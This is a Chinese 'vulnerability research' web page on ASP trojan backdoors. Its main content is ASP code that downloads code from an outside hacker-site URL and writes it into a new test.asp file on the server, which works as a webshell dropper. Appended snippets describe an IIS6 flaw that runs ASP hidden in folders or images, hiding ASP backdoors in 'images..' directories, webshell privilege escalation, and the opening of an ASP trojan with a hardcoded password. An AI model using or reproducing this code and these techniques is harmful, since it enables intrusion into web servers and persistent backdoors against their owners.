ASP木马后门新思路_漏洞研究

<%  

Function GetPage(url)  

dim Retrieval  

Set Retrieval = createObject("Microsoft.XMLHTTP")  

With Retrieval  

.Open "Get", url, False ', "", ""  

.Send  

GetPage = BytesToBstr(.ResponseBody)  

End With  

Set Retrieval = Nothing  

End Function  

Function BytesToBstr(body)  

dim objstream  

set objstream = Server.createObject("adodb.stream")  

objstream.Type = 1  

objstream.Mode =3  

objstream.Open  

objstream.Write body  

objstream.Position = 0  

objstream.Type = 2  

objstream.Charset = "GB2312"  

BytesToBstr = objstream.ReadText  

objstream.Close  

set objstream = nothing  

End Function  

on error resume next  

Url="http://www.heibai.org/hacker/daemon.txt"  

response.write "开始取得远程代码........"  

wstr = GetPage(Url)  

Set fs=Server.createObject("Scripting.FileSystemObject")  

Set CrFi=fs.createTextFile(server.MapPath("./")&"\test.asp")  

Crfi.Writeline(wstr)  

set CrFi=nothing  

set fs=nothing  

response.write "...<font color=red>生成test.asp文件成功</font>"  

%>  

时间: 2024-10-27 23:36:38

ASP木马后门新思路_漏洞研究的相关文章

Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷_漏洞研究

写这篇文章的前几天我发现了IIS6更大的漏洞,让我高兴了整整24小时.可惜的是那个漏洞是我手工配置出来的.实现方法是将ASP后辍改为JPG后辍,将JPG复制到IIS发布目录中,发现JPG中的ASP代码会正确执行.看我是如何配置出的错误,这个方法也可以用来配置后门.Windows 2003 Enterprise Edition是微软一款新推出的操作系统. Windows 2003 IIS6处理文件夹扩展名的时候出错,导致放在该目录中的JPG图片会自动执行其中的ASP代码.当JPG后辍的文件含有AS

网友举报:屁屁宽频软件自带木马病毒(图)_漏洞研究

昨天下载屁屁宽频.测试验证该程序有木马病毒. 系统启动项加载mstasks.exe 下面引自瑞星升级报告之: 27.Trojan.SdBot.gen.p 破坏方法:拷贝自己到系统目录,命名为MSTASKS.EXE,登记为自启动. 病毒驻留内存,非法连接hirc.3322.org,将本地信息泄漏出去. http://virus.chinavnet.com/newSite/Channels/Anti_Virus/Upgrade_Report/Upgrade_Report/200308/18-1708

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们

破解别人的asp木马密码的方法_漏洞研究

    破解目标:破解一asp木马的经过加密的登破解asp木马密码陆密码.由于木马里没有版本说明,具体也不知道这木马叫什么名.      破解思路:两种,用加密后的密码替换密文和利用密文及加密算法反解出密码.前者根本算不上真正的破解.      破解目的:没事破着玩.      如果得不到asp源代码,那么可以说对破解密码,我毫无胜算.有位华夏的朋友说他得到了一个web的权限,  但是无法修改主页,发现其中已经有个asp木马,但密码是经过加密的.那么就有了这篇动画了.好了,废  话太多了,那么,

你根本想不到的——IIS另类后门_漏洞研究

终于由学校步入了社会,发现其实学校还是有很多值得我们留恋的地方,而工作其实蛮辛苦的,最主要的是不能经常和朋友一起去网上玩了.上周六回了趟学校,在主机房里和做网管的朋友聊天,偶然发现一个很熟的ASP程序在服务器的网站目录里(以前我是学校网络组的成员之一),于是连了下看看,没有给予匿名浏览的权限,不过账号勾选的是记住密码,登录成功.网页显示"添加test2用户成功","添加test2管理员成功".呵呵,我连管理员密码都不知道呢.打开3389,叫朋友看了下用户列表-- 

Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范_漏洞研究

一.概述    漏洞介绍: http://coolersky.com/leak/programme/bbs/2006/0515/515.html     前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了,一直也没时间看看,下午跟Edward要了个链接看了看: http://www.eviloctal.com/forum/read.php?tid=22074     本站转贴为: http://coolersky.com/articles/hack/analysis/prog

隐藏ASP木马后门的两种方法_木马相关

1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir 

webshell权限提升技巧_漏洞研究

WEBSHELL权限提升技巧 c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pro

一款不错的asp木马 黑色界面_木马相关

<% Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next UserPass="643617"                           '密码 mName="BY:.尐飛"           '后门名字 Copyright="注:请勿用于非法用途,否则后果作者概不负责"       '版权 Server.ScriptTimeout=9